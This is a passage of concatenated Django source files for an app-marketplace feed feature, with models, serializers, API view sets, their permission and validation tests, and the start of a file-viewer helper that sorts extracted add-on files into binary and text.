    cors_allowed_methods = ['get']
    def _feature(self, i, slug):
        # Build the (key, payload) pair for one feature; 'position' is
        # 1-based and follows APP_FEATURES ordering.
        feature = APP_FEATURES[slug.upper()]
        data = {
            'name': feature['name'],
            'description': feature['description'],
            'position': i + 1,
        }
        # 'present' is only reported when the client sent a profile
        # signature via the 'pro' querystring (see get()).
        if self.profile:
            data['present'] = self.profile.get(slug.lower(), False)
        return (slug.lower(), data)
    def get(self, request, *args, **kwargs):
        # self.profile must be set before _feature() runs.
        if 'pro' in request.GET:
            self.profile = FeatureProfile.from_signature(request.GET['pro'])
        else:
            self.profile = None
        features = OrderedDict(self._feature(i, slug) for i, slug in
                               enumerate(APP_FEATURES.keys()))
        return Response(features, status=status.HTTP_200_OK)
########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
import amo.models
from amo.models import SlugField
from addons.models import Category, Preview
from translations.fields import PurifiedField, save_signal
import mkt.carriers
import mkt.regions
from mkt.collections.fields import ColorField
from mkt.collections.models import Collection
from mkt.constants.feed import FEEDAPP_TYPES
from mkt.ratings.validators import validate_rating
from mkt.webapps.models import Webapp
class FeedApp(amo.models.ModelBase):
    """
    Thin wrapper around the Webapp class that allows single apps to be featured
    on the feed.
    """
    app = models.ForeignKey(Webapp)
    feedapp_type = models.CharField(choices=FEEDAPP_TYPES, max_length=30)
    description = PurifiedField()
    slug = SlugField(max_length=30)
    # Background colour used when rendering the feed tile.
    background_color = ColorField(null=True)
    has_image = models.BooleanField(default=False)
    # Optionally linked to a Preview (screenshot or video).
    preview = models.ForeignKey(Preview, null=True, blank=True)
    # Optionally linked to a pull quote.
    pullquote_rating = models.PositiveSmallIntegerField(null=True, blank=True,
        validators=[validate_rating])
    pullquote_text = PurifiedField(null=True)
    pullquote_attribution = PurifiedField(null=True)
    class Meta:
        db_table = 'mkt_feed_app'
    def clean(self):
        """
        Require `pullquote_text` if `pullquote_rating` or
        `pullquote_attribution` are set.
        """
        if not self.pullquote_text and (self.pullquote_rating or
                                        self.pullquote_attribution):
            raise ValidationError('Pullquote text required if rating or '
                                  'attribution is defined.')
        super(FeedApp, self).clean()
    def image_path(self):
        # Shard images into per-thousand-pk directories to keep any one
        # directory from growing unboundedly.
        return os.path.join(settings.FEATURED_APP_BG_PATH,
                            str(self.pk / 1000),
                            'featured_app_%s.png' % (self.pk,))
class FeedItem(amo.models.ModelBase):
    """
    Allows objects from multiple models to be hung off the feed.
    """
    # Optional targeting dimensions for where the item appears.
    category = models.ForeignKey(Category, null=True, blank=True)
    region = models.PositiveIntegerField(default=None, null=True, blank=True,
                                         choices=mkt.regions.REGIONS_CHOICES_ID,
                                         db_index=True)
    carrier = models.IntegerField(default=None, null=True, blank=True,
                                  choices=mkt.carriers.CARRIER_CHOICES,
                                  db_index=True)
    # Types of objects that may be contained by a feed item.
    app = models.ForeignKey(FeedApp, null=True)
    collection = models.ForeignKey(Collection, null=True)
    class Meta:
        db_table = 'mkt_feed_item'
# Save translations (the PurifiedField values) when saving a FeedApp
# instance; dispatch_uid prevents duplicate registration on re-import.
models.signals.pre_save.connect(save_signal, sender=FeedApp,
                                dispatch_uid='feedapp_translations')
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import relations, serializers
import amo
import mkt.carriers
import mkt.regions
from addons.models import Category
from mkt.api.fields import SplitField, TranslationSerializerField
from mkt.api.serializers import URLSerializerMixin
from mkt.collections.serializers import (CollectionImageField,
CollectionSerializer, SlugChoiceField,
SlugModelChoiceField)
from mkt.submit.serializers import PreviewSerializer
from mkt.webapps.serializers import AppSerializer
from .models import FeedApp, FeedItem
class FeedAppSerializer(URLSerializerMixin, serializers.ModelSerializer):
    """Thin wrappers around apps w/ metadata related to its feature in feed."""
    # SplitField: accepts a primary key on write, renders the full nested
    # serialization on read.
    app = SplitField(relations.PrimaryKeyRelatedField(required=True),
                     AppSerializer())
    description = TranslationSerializerField(required=False)
    image = CollectionImageField(
        source='*',
        view_name='feed-app-image-detail',
        format='png')
    preview = SplitField(relations.PrimaryKeyRelatedField(required=False),
                         PreviewSerializer())
    pullquote_attribution = TranslationSerializerField(required=False)
    pullquote_rating = serializers.IntegerField(required=False)
    pullquote_text = TranslationSerializerField(required=False)
    class Meta:
        fields = ('app', 'background_color', 'description', 'feedapp_type',
                  'id', 'image', 'preview', 'pullquote_attribution',
                  'pullquote_rating', 'pullquote_text', 'slug', 'url')
        model = FeedApp
        url_basename = 'feedapps'
class FeedItemSerializer(URLSerializerMixin, serializers.ModelSerializer):
    """Serializer for FeedItem: targeting metadata plus exactly one
    contained object (currently only collections).

    The class docstring previously copy-pasted FeedAppSerializer's; this
    serializer wraps feed *items*, not single apps.
    """
    carrier = SlugChoiceField(required=False,
                              choices_dict=mkt.carriers.CARRIER_MAP)
    region = SlugChoiceField(required=False,
                             choices_dict=mkt.regions.REGION_LOOKUP)
    category = SlugModelChoiceField(required=False,
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
    item_type = serializers.SerializerMethodField('get_item_type')
    # Types of objects that are allowed to be a feed item.
    collection = SplitField(relations.PrimaryKeyRelatedField(required=False),
                            CollectionSerializer())
    class Meta:
        fields = ('carrier', 'category', 'collection', 'id', 'item_type',
                  'region', 'url')
        item_types = ('collection',)
        model = FeedItem
        url_basename = 'feeditems'
    def validate(self, attrs):
        """
        If any item-type field is being changed, ensure that exactly one
        of them carries a value; otherwise leave the attrs untouched.
        """
        # 'k in attrs' instead of 'k in attrs.keys()': same semantics,
        # idiomatic membership test.
        item_changed = any(k in attrs for k in self.Meta.item_types)
        num_defined = sum(1 for k in self.Meta.item_types if attrs.get(k))
        if item_changed and num_defined != 1:
            message = ('A valid value for exactly one of the following '
                       'parameters must be defined: %s' % ','.join(
                           self.Meta.item_types))
            raise serializers.ValidationError(message)
        return attrs
    def get_item_type(self, obj):
        """Return the name of the item type this feed item holds, if any."""
        for item_type in self.Meta.item_types:
            if getattr(obj, item_type):
                return item_type
        return None
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import ok_
from django.core.exceptions import ValidationError
import amo.tests
from mkt.feed.models import FeedApp
from mkt.webapps.models import Webapp
from .test_views import FeedAppMixin
class TestFeedApp(FeedAppMixin, amo.tests.TestCase):
    """Model-level validation tests for FeedApp."""
    def setUp(self):
        super(TestFeedApp, self).setUp()
        self.feedapp_data.update(**self.pullquote_data)
        # The mixin stores the app as a pk; the model needs the instance.
        self.feedapp_data['app'] = (
            Webapp.objects.get(pk=self.feedapp_data['app']))
    def test_create(self):
        feedapp = FeedApp(**self.feedapp_data)
        ok_(isinstance(feedapp, FeedApp))
        feedapp.clean_fields()  # Tests validators on fields.
        feedapp.clean()  # Test model validation.
        feedapp.save()  # Tests required fields.
    def test_missing_pullquote_rating(self):
        # Rating is optional when the quote text is present.
        del self.feedapp_data['pullquote_rating']
        self.test_create()
    def test_missing_pullquote_text(self):
        # Rating/attribution without text must fail model validation.
        del self.feedapp_data['pullquote_text']
        with self.assertRaises(ValidationError):
            self.test_create()
    def test_pullquote_rating_fractional(self):
        """
        This passes because PositiveSmallIntegerField will coerce the float into
        an int, which effectively returns math.floor(value).
        """
        self.feedapp_data['pullquote_rating'] = 4.5
        self.test_create()
    def test_bad_pullquote_rating_low(self):
        self.feedapp_data['pullquote_rating'] = -1
        with self.assertRaises(ValidationError):
            self.test_create()
    def test_bad_pullquote_rating_high(self):
        self.feedapp_data['pullquote_rating'] = 6
        with self.assertRaises(ValidationError):
            self.test_create()
########NEW FILE########
__FILENAME__ = test_serializers
# -*- coding: utf-8 -*-
from rest_framework import serializers
import amo
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.feed.serializers import FeedItemSerializer
from mkt.regions import RESTOFWORLD
class CollectionFeedMixin(object):
    """Test mixin that creates a basic Collection before each test."""
    collection_data = {
        'collection_type': COLLECTIONS_TYPE_BASIC,
        'name': {'en-US': u'A collection of my favourite gàmes'},
        'slug': 'my-favourite-games',
        'description': {'en-US': u'A collection of my favourite gamés'},
    }
    def setUp(self):
        self.collection = Collection.objects.create(**self.collection_data)
        super(CollectionFeedMixin, self).setUp()
class TestFeedItemSerializer(CollectionFeedMixin, amo.tests.TestCase):
    """Validation tests for FeedItemSerializer."""
    def serializer(self, item=None, **context):
        # Build a serializer, bound to `item` when one is passed.
        if not item:
            return FeedItemSerializer(context=context)
        return FeedItemSerializer(item, context=context)
    def validate(self, **attrs):
        return self.serializer().validate(attrs=attrs)
    def test_validate_passes(self):
        self.validate(collection=self.collection)
    def test_validate_fails_no_items(self):
        # A feed item must carry exactly one contained object.
        with self.assertRaises(serializers.ValidationError):
            self.validate(collection=None)
    def test_region_handles_worldwide(self):
        # The legacy 'worldwide' region slug maps to RESTOFWORLD.
        data = {
            'region': 'worldwide',
            'item_type': 'collection',
            'collection': self.collection.id,
        }
        serializer = FeedItemSerializer(data=data)
        assert serializer.is_valid()
        assert serializer.object.region == RESTOFWORLD.id
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import json
from nose.tools import eq_, ok_
from django.core.urlresolvers import reverse
import mkt.carriers
import mkt.regions
from addons.models import Preview
from mkt.api.tests.test_oauth import RestOAuth
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
from mkt.feed.models import FeedApp, FeedItem
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
class CollectionMixin(object):
    """Test mixin that creates a public basic Collection before each test."""
    collection_data = {
        'author': u'My Àuthør',
        'collection_type': COLLECTIONS_TYPE_BASIC,
        'is_public': True,
        'name': {'en-US': u'My Favorite Gamés'},
        'slug': u'my-favourite-gamés',
    }
    def setUp(self):
        self.collection = Collection.objects.create(**self.collection_data)
        super(CollectionMixin, self).setUp()
class FeedAppMixin(object):
    """Test mixin supplying FeedApp fixture data and a factory helper."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        # 'app' is the fixture webapp's pk; create_feedapps() swaps in
        # the instance when needed.
        self.feedapp_data = {
            'app': 337141,
            'background_color': '#B90000',
            'feedapp_type': 'icon',
            'description': {
                'en-US': u'pan-fried potatoes'
            },
            'has_image': False,
            'slug': 'my-feed-app',
        }
        self.pullquote_data = {
            'pullquote_text': {'en-US': u'The bést!'},
            'pullquote_rating': 4,
            'pullquote_attribution': {'en-US': u'Jamés Bond'}
        }
        self.feedapps = []
        super(FeedAppMixin, self).setUp()
    def create_feedapps(self, n=2, **kwargs):
        """Create and return `n` FeedApps, tracking them on self.feedapps."""
        data = dict(self.feedapp_data)
        data.update(kwargs)
        if not isinstance(data['app'], Webapp):
            data['app'] = Webapp.objects.get(pk=data['app'])
        feedapps = [FeedApp.objects.create(**data) for idx in xrange(n)]
        self.feedapps.extend(feedapps)
        return feedapps
class BaseTestFeedItemViewSet(RestOAuth):
    """Shared setup for the FeedItem API view set test classes."""
    def setUp(self):
        super(BaseTestFeedItemViewSet, self).setUp()
        self.profile = self.user
    def feed_permission(self):
        """
        Grant the Feed:Curate permission to the authenticating user.
        """
        self.grant_permission(self.profile, 'Feed:Curate')
class TestFeedItemViewSetList(CollectionMixin, BaseTestFeedItemViewSet):
    """
    Tests the handling of GET requests to the list endpoint of FeedItemViewSet.
    """
    def setUp(self):
        super(TestFeedItemViewSetList, self).setUp()
        self.url = reverse('api-v2:feeditems-list')
        self.item = FeedItem.objects.create(collection=self.collection)
    def list(self, client, **kwargs):
        # Issue the GET and return (response, decoded JSON body).
        res = client.get(self.url, kwargs)
        data = json.loads(res.content)
        return res, data
    def test_list_anonymous(self):
        # Listing is public: no auth required.
        res, data = self.list(self.anon)
        eq_(res.status_code, 200)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['id'], self.item.id)
    def test_list_no_permission(self):
        res, data = self.list(self.client)
        eq_(res.status_code, 200)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['id'], self.item.id)
    def test_list_with_permission(self):
        self.feed_permission()
        res, data = self.list(self.client)
        eq_(res.status_code, 200)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['id'], self.item.id)
class TestFeedItemViewSetCreate(CollectionMixin, BaseTestFeedItemViewSet):
    """
    Tests the handling of POST requests to the list endpoint of FeedItemViewSet.
    """
    def setUp(self):
        super(TestFeedItemViewSetCreate, self).setUp()
        self.url = reverse('api-v2:feeditems-list')
    def create(self, client, **kwargs):
        # POST the kwargs as a JSON body; return (response, decoded body).
        res = client.post(self.url, json.dumps(kwargs))
        data = json.loads(res.content)
        return res, data
    def test_create_anonymous(self):
        res, data = self.create(self.anon, collection=self.collection.pk)
        eq_(res.status_code, 403)
    def test_create_no_permission(self):
        # Authenticated but without Feed:Curate: still forbidden.
        res, data = self.create(self.client, collection=self.collection.pk)
        eq_(res.status_code, 403)
    def test_create_with_permission(self):
        self.feed_permission()
        res, data = self.create(self.client, collection=self.collection.pk,
                                carrier=mkt.carriers.TELEFONICA.id,
                                region=mkt.regions.BR.id)
        eq_(res.status_code, 201)
        self.assertCORS(res, 'get', 'post')
        eq_(data['collection']['id'], self.collection.pk)
    def test_create_no_data(self):
        self.feed_permission()
        res, data = self.create(self.client)
        eq_(res.status_code, 400)
class TestFeedItemViewSetDetail(CollectionMixin, BaseTestFeedItemViewSet):
    """
    Tests the handling of GET requests to detail endpoints of FeedItemViewSet.
    """
    def setUp(self):
        super(TestFeedItemViewSetDetail, self).setUp()
        self.item = FeedItem.objects.create(collection=self.collection)
        self.url = reverse('api-v2:feeditems-detail',
                           kwargs={'pk': self.item.pk})
    def detail(self, client, **kwargs):
        # Issue the GET and return (response, decoded JSON body).
        res = client.get(self.url, kwargs)
        data = json.loads(res.content)
        return res, data
    def test_list_anonymous(self):
        # Detail view is public.
        res, data = self.detail(self.anon)
        eq_(res.status_code, 200)
        eq_(data['id'], self.item.pk)
    def test_list_no_permission(self):
        res, data = self.detail(self.client)
        eq_(res.status_code, 200)
        eq_(data['id'], self.item.pk)
    def test_list_with_permission(self):
        self.feed_permission()
        res, data = self.detail(self.client)
        eq_(res.status_code, 200)
        eq_(data['id'], self.item.pk)
class TestFeedItemViewSetUpdate(CollectionMixin, BaseTestFeedItemViewSet):
    """
    Tests the handling of PATCH requests to detail endpoints of FeedItemViewSet.
    """
    def setUp(self):
        super(TestFeedItemViewSetUpdate, self).setUp()
        self.item = FeedItem.objects.create(collection=self.collection)
        self.url = reverse('api-v2:feeditems-detail',
                           kwargs={'pk': self.item.pk})
    def update(self, client, **kwargs):
        # PATCH the kwargs as a JSON body; return (response, decoded body).
        res = client.patch(self.url, json.dumps(kwargs))
        data = json.loads(res.content)
        return res, data
    def test_update_anonymous(self):
        res, data = self.update(self.anon)
        eq_(res.status_code, 403)
    def test_update_no_permission(self):
        # Authenticated but without Feed:Curate: still forbidden.
        res, data = self.update(self.client)
        eq_(res.status_code, 403)
    def test_update_with_permission(self):
        self.feed_permission()
        res, data = self.update(self.client, region=mkt.regions.US.id)
        eq_(res.status_code, 200)
        eq_(data['id'], self.item.pk)
        eq_(data['region'], mkt.regions.US.slug)
    def test_update_no_items(self):
        # Clearing the only contained object must fail validation.
        self.feed_permission()
        res, data = self.update(self.client, collection=None)
        eq_(res.status_code, 400)
class TestFeedItemViewSetDelete(CollectionMixin, BaseTestFeedItemViewSet):
    """
    Tests the handling of DELETE requests to detail endpoints of
    FeedItemViewSet.
    """
    def setUp(self):
        super(TestFeedItemViewSetDelete, self).setUp()
        self.item = FeedItem.objects.create(collection=self.collection)
        self.url = reverse('api-v2:feeditems-detail',
                           kwargs={'pk': self.item.pk})
    def delete(self, client, **kwargs):
        # Issue the DELETE; 204 responses have no body, so fall back to ''.
        res = client.delete(self.url)
        data = json.loads(res.content) if res.content else ''
        return res, data
    # Methods renamed from test_update_* (copy-paste from the PATCH test
    # class above) to test_delete_* so failures report the right action.
    def test_delete_anonymous(self):
        res, data = self.delete(self.anon)
        eq_(res.status_code, 403)
    def test_delete_no_permission(self):
        # Authenticated but without Feed:Curate: still forbidden.
        res, data = self.delete(self.client)
        eq_(res.status_code, 403)
    def test_delete_with_permission(self):
        self.feed_permission()
        res, data = self.delete(self.client)
        eq_(res.status_code, 204)
class BaseTestFeedAppViewSet(FeedAppMixin, RestOAuth):
    """Shared setup for the FeedApp API view set test classes."""
    fixtures = FeedAppMixin.fixtures + RestOAuth.fixtures
    def setUp(self):
        super(BaseTestFeedAppViewSet, self).setUp()
        self.app = Webapp.objects.get(pk=337141)
        self.profile = self.user
    def feed_permission(self):
        """
        Grant the Feed:Curate permission to the authenticating user.
        """
        self.grant_permission(self.profile, 'Feed:Curate')
class TestFeedAppViewSetList(BaseTestFeedAppViewSet):
    """
    Tests the handling of GET requests to the list endpoint of FeedAppViewSet.
    """
    # Number of FeedApps to create and expect in the listing.
    num = 2
    def setUp(self):
        super(TestFeedAppViewSetList, self).setUp()
        self.url = reverse('api-v2:feedapps-list')
        self.create_feedapps(self.num)
    def list(self, client):
        res = client.get(self.url)
        data = json.loads(res.content)
        return res, data
    def _test_list(self, client):
        # Listing must return every created FeedApp regardless of auth.
        res, data = self.list(client)
        eq_(res.status_code, 200)
        objects = data['objects']
        eq_(data['meta']['total_count'], self.num)
        eq_(len(objects), self.num)
        self.assertSetEqual([obj['id'] for obj in objects],
                            [fa.id for fa in self.feedapps])
    def test_list_anonymous(self):
        self._test_list(self.anon)
    def test_list_no_permission(self):
        self._test_list(self.client)
    def test_list_with_permission(self):
        self.feed_permission()
        self._test_list(self.client)
class TestFeedAppViewSetCreate(BaseTestFeedAppViewSet):
    """
    Tests the handling of POST requests to the list endpoint of FeedAppViewSet.
    """
    fixtures = BaseTestFeedAppViewSet.fixtures
    def setUp(self):
        super(TestFeedAppViewSetCreate, self).setUp()
        self.url = reverse('api-v2:feedapps-list')
    def create(self, client, **kwargs):
        # POST the kwargs as a JSON body; return (response, decoded body).
        res = client.post(self.url, json.dumps(kwargs))
        data = json.loads(res.content)
        return res, data
    def test_create_anonymous(self):
        res, data = self.create(self.anon)
        eq_(res.status_code, 403)
    def test_create_no_permission(self):
        # Authenticated but without Feed:Curate: still forbidden.
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 403)
    def test_create_with_permission(self):
        # Also serves as the happy-path helper for the variants below,
        # which tweak self.feedapp_data first and reuse its assertions.
        self.feed_permission()
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 201)
        eq_(data['app']['id'], self.feedapp_data['app'])
        eq_(data['description'], self.feedapp_data['description'])
        eq_(data['slug'], self.feedapp_data['slug'])
        eq_(data['feedapp_type'], self.feedapp_data['feedapp_type'])
        self.assertCORS(res, 'get', 'post')
        return res, data
    def test_create_with_background_color(self):
        self.feedapp_data.update(background_color='#00AACC')
        res, data = self.test_create_with_permission()
        eq_(data['background_color'], '#00AACC')
    def test_create_with_preview(self):
        preview = Preview.objects.create(addon=self.app, position=0)
        self.feedapp_data.update(preview=preview.pk)
        res, data = self.test_create_with_permission()
        eq_(data['preview']['id'], preview.id)
    def test_create_with_pullquote(self):
        self.feedapp_data.update(**self.pullquote_data)
        res, data = self.test_create_with_permission()
        for field, value in self.pullquote_data.iteritems():
            eq_(data[field], value)
    def test_create_with_pullquote_no_rating(self):
        # Rating is optional when quote text is supplied.
        del self.pullquote_data['pullquote_rating']
        self.test_create_with_pullquote()
    def test_create_with_pullquote_no_text(self):
        # Rating/attribution without text fails model-level validation.
        self.feed_permission()
        del self.pullquote_data['pullquote_text']
        self.feedapp_data.update(**self.pullquote_data)
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 400)
        ok_('__all__' in data)
    def test_create_with_pullquote_bad_rating_fractional(self):
        self.feed_permission()
        self.pullquote_data['pullquote_rating'] = 4.5
        self.feedapp_data.update(**self.pullquote_data)
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 400)
        ok_('pullquote_rating' in data)
    def test_create_with_pullquote_bad_rating_high(self):
        self.feed_permission()
        self.pullquote_data['pullquote_rating'] = 6
        self.feedapp_data.update(**self.pullquote_data)
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 400)
        ok_('pullquote_rating' in data)
    def test_create_with_pullquote_bad_rating_low(self):
        self.feed_permission()
        self.pullquote_data['pullquote_rating'] = -1
        self.feedapp_data.update(**self.pullquote_data)
        res, data = self.create(self.client, **self.feedapp_data)
        eq_(res.status_code, 400)
        ok_('pullquote_rating' in data)
    def test_create_no_data(self):
        self.feed_permission()
        res, data = self.create(self.client)
        eq_(res.status_code, 400)
class TestFeedAppViewSetDetail(BaseTestFeedAppViewSet):
    """
    Tests the handling of GET requests to detail endpoints of FeedAppViewSet.
    """

    def setUp(self):
        super(TestFeedAppViewSetDetail, self).setUp()
        self.feedapp = self.create_feedapps(1)[0]
        self.url = reverse('api-v2:feedapps-detail',
                           kwargs={'pk': self.feedapp.pk})

    def detail(self, client, **kwargs):
        # GET the detail endpoint and decode the JSON response body.
        response = client.get(self.url)
        return response, json.loads(response.content)

    def _test_detail(self, client):
        # Shared assertions: any client may read a feed app's detail.
        response, body = self.detail(client)
        eq_(response.status_code, 200)
        eq_(body['id'], self.feedapp.pk)
        eq_(body['url'], self.url)
        eq_(body['app']['id'], self.feedapp.app.id)
        ok_(not body['preview'])
        ok_(not body['pullquote_text'])

    def test_detail_anonymous(self):
        self._test_detail(self.anon)

    def test_detail_no_permission(self):
        self._test_detail(self.client)

    def test_detail_with_permission(self):
        self.feed_permission()
        self._test_detail(self.client)
class TestFeedAppViewSetUpdate(BaseTestFeedAppViewSet):
    """
    Tests the handling of PATCH requests to detail endpoints of FeedAppViewSet.
    """
    fixtures = BaseTestFeedAppViewSet.fixtures

    def setUp(self):
        super(TestFeedAppViewSetUpdate, self).setUp()
        self.feedapp = self.create_feedapps(1)[0]
        self.url = reverse('api-v2:feedapps-detail',
                           kwargs={'pk': self.feedapp.pk})

    def update(self, client, **kwargs):
        # PATCH the detail endpoint with a JSON body built from kwargs.
        response = client.patch(self.url, json.dumps(kwargs))
        return response, json.loads(response.content)

    def test_update_anonymous(self):
        """Anonymous PATCH requests are rejected."""
        response, body = self.update(self.anon)
        eq_(response.status_code, 403)

    def test_update_no_permission(self):
        """PATCH without the curation permission is rejected."""
        response, body = self.update(self.client, **self.feedapp_data)
        eq_(response.status_code, 403)

    def test_update_with_permission(self):
        """Curators may update translated fields."""
        self.feed_permission()
        new_description = {
            'en-US': u"BastaCorp's famous pan-fried potatoes",
            'fr': u'pommes de terre sautées de BastaCorp'
        }
        response, body = self.update(self.client,
                                     description=new_description)
        eq_(response.status_code, 200)
        eq_(body['description'], new_description)

    def test_update_invalid_app(self):
        """Pointing the app field at an unusable pk fails validation."""
        self.feed_permission()
        response, body = self.update(self.client, app=1)
        eq_(response.status_code, 400)
        ok_('app' in body)

    def test_update_no_app(self):
        """The app field cannot be cleared to null."""
        self.feed_permission()
        response, body = self.update(self.client, app=None)
        eq_(response.status_code, 400)
        ok_('app' in body)
class TestFeedAppViewSetDelete(BaseTestFeedAppViewSet):
    """
    Tests the handling of DELETE requests to detail endpoints of FeedAppViewSet.
    """

    def setUp(self):
        super(TestFeedAppViewSetDelete, self).setUp()
        self.feedapp = self.create_feedapps(1)[0]
        self.url = reverse('api-v2:feedapps-detail',
                           kwargs={'pk': self.feedapp.pk})

    def delete(self, client, **kwargs):
        # Successful DELETEs have an empty body, so only decode when
        # there is content.
        response = client.delete(self.url)
        body = json.loads(response.content) if response.content else ''
        return response, body

    def test_delete_anonymous(self):
        """Anonymous DELETE requests are rejected."""
        response, body = self.delete(self.anon)
        eq_(response.status_code, 403)

    def test_delete_no_permission(self):
        """DELETE without the curation permission is rejected."""
        response, body = self.delete(self.client)
        eq_(response.status_code, 403)

    def test_delete_with_permission(self):
        """Curators may delete a feed app; the response is 204 No Content."""
        self.feed_permission()
        response, body = self.delete(self.client)
        eq_(response.status_code, 204)
########NEW FILE########
__FILENAME__ = views
from rest_framework import viewsets
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowReadOnly, AnyOf, GroupPermission
from mkt.api.base import CORSMixin
from mkt.collections.views import CollectionImageViewSet
from .models import FeedApp, FeedItem
from .serializers import FeedAppSerializer, FeedItemSerializer
class FeedItemViewSet(CORSMixin, viewsets.ModelViewSet):
    """CRUD API for feed items.

    Reads are open to any client (including anonymous); writes require
    the Feed:Curate group permission.
    """
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    permission_classes = [AnyOf(AllowReadOnly,
                                GroupPermission('Feed', 'Curate'))]
    queryset = FeedItem.objects.all()
    cors_allowed_methods = ('get', 'post')
    serializer_class = FeedItemSerializer
class FeedAppViewSet(CORSMixin, viewsets.ModelViewSet):
    """CRUD API for feed apps.

    Same access rules as FeedItemViewSet: public reads, Feed:Curate for
    writes.
    """
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    permission_classes = [AnyOf(AllowReadOnly,
                                GroupPermission('Feed', 'Curate'))]
    queryset = FeedApp.objects.all()
    cors_allowed_methods = ('get', 'post')
    serializer_class = FeedAppSerializer
class FeedAppImageViewSet(CollectionImageViewSet):
    # Reuses the collection image endpoints, pointed at FeedApp objects.
    queryset = FeedApp.objects.all()
########NEW FILE########
__FILENAME__ = helpers
import codecs
import json
import mimetypes
import os
import stat
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_unicode
import commonware.log
import jinja2
from cache_nuggets.lib import memoize, Message
from jingo import env, register
from tower import ugettext as _
import amo
from amo.utils import rm_local_tmp_dir
from files.utils import extract_xpi, get_md5
from validator.testcases.packagelayout import (blacklisted_extensions,
blacklisted_magic_numbers)
# Allow files with a shebang through: (0x23, 0x21) is '#!', and 'sh' is
# dropped from the extension blacklist so shell scripts stay viewable.
blacklisted_magic_numbers = [
    b for b in list(blacklisted_magic_numbers) if b != (0x23, 0x21)]
blacklisted_extensions = [
    b for b in list(blacklisted_extensions) if b != 'sh']

task_log = commonware.log.getLogger('z.task')
@register.function
def file_viewer_class(value, key):
    """Return the space-joined CSS classes for one file-tree node.

    `value` is a file entry from FileViewer.get_files(); `key` is the
    short path of the currently selected file.
    """
    classes = ['directory closed' if value['directory'] else 'file']
    if value['short'] == key:
        classes.append('selected')
    if value.get('diff'):
        classes.append('diff')
    return ' '.join(classes)
@register.function
def file_tree(files, selected):
    """Render the file listing as nested <ul> markup.

    `files` is the ordered dict from FileViewer.get_files() (each entry
    carries a 'depth'); `selected` is the key of the file being viewed.
    """
    depth = 0
    output = ['<ul class="root">']
    t = env.get_template('fileviewer/node.html')
    for k, v in files.items():
        if v['depth'] > depth:
            # Entering a subdirectory: open a new, initially-hidden list.
            output.append('<ul class="js-hidden">')
        elif v['depth'] < depth:
            # Leaving one or more directory levels: close their lists.
            output.extend(['</ul>' for x in range(v['depth'], depth)])
        output.append(t.render({'value': v, 'selected': selected}))
        depth = v['depth']
    # Close any lists still open, plus the root.
    output.extend(['</ul>' for x in range(depth, -1, -1)])
    return jinja2.Markup('\n'.join(output))
class FileViewer(object):
    """
    Provide access to a storage-managed file by copying it locally and
    extracting info from it. `src` is a storage-managed path and `dest` is a
    local temp path.
    """

    def __init__(self, file_obj):
        self.file = file_obj
        self.addon = self.file.version.addon
        # Disabled files live in the guarded path; everything else uses
        # the regular public file path.
        self.src = (file_obj.guarded_file_path
                    if file_obj.status == amo.STATUS_DISABLED
                    else file_obj.file_path)
        self.dest = os.path.join(settings.TMP_PATH, 'file_viewer',
                                 str(file_obj.pk))
        # _files caches get_files(); selected is the entry picked via
        # select().
        self._files, self.selected = None, None

    def __str__(self):
        return str(self.file.id)

    def _extraction_cache_key(self):
        # Key of the Message flag marking an extraction as in progress.
        return ('%s:file-viewer:extraction-in-progress:%s' %
                (settings.CACHE_PREFIX, self.file.id))

    def extract(self):
        """
        Will make all the directories and expand the files.
        Raises error on nasty files.
        """
        try:
            os.makedirs(os.path.dirname(self.dest))
        except OSError, err:
            # Most likely the directory already exists; if dest is truly
            # unusable the extraction below fails loudly anyway.
            pass

        # This is called `extract_xpi` but it unzips like a zip file.
        try:
            extract_xpi(self.src, self.dest, expand=True)
        except Exception, err:
            task_log.error('Error (%s) extracting %s' % (err, self.src))
            raise

    def cleanup(self):
        """Delete the locally-extracted copy, if present."""
        if os.path.exists(self.dest):
            rm_local_tmp_dir(self.dest)

    def is_extracted(self):
        """If the file has been extracted or not."""
        return (os.path.exists(self.dest) and not
                Message(self._extraction_cache_key()).get())

    def _is_binary(self, mimetype, path):
        """Uses the filename to see if the file can be shown in HTML or not.

        Returns True for binaries, the string 'image' (truthy) for binary
        image files, and False for viewable text.
        """
        # Re-use the blacklisted data from amo-validator to spot binaries.
        ext = os.path.splitext(path)[1][1:]
        if ext in blacklisted_extensions:
            return True

        if os.path.exists(path) and not os.path.isdir(path):
            with storage.open(path, 'r') as rfile:
                # Compare the first four bytes against known signatures.
                bytes = tuple(map(ord, rfile.read(4)))
            if any(bytes[:len(x)] == x for x in blacklisted_magic_numbers):
                return True

        if mimetype:
            major, minor = mimetype.split('/')
            if major == 'image':
                return 'image'  # Mark that the file is binary, but an image.

        return False

    def read_file(self, allow_empty=False):
        """
        Reads the file. Imposes a file limit and tries to cope with
        UTF-8 and UTF-16 files appropriately. Return file contents and
        a list of error messages.
        """
        try:
            file_data = self._read_file(allow_empty)
            # If this is a webapp manifest, we should try to pretty print it.
            if (self.selected and
